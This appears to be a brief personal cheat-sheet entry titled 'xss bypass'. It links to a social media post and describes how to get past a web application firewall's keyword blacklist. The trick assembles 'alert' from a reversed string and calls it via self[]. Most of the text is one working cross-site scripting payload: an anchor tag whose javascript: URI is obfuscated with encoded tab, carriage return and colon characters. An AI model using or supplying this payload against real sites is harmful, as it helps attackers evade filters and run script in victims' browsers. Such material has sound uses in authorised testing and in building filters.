xss bypass

1. blackist bypass

https://x.com/erickfernandox/status/1845901672414945283

If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[].

Payload:

<a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)>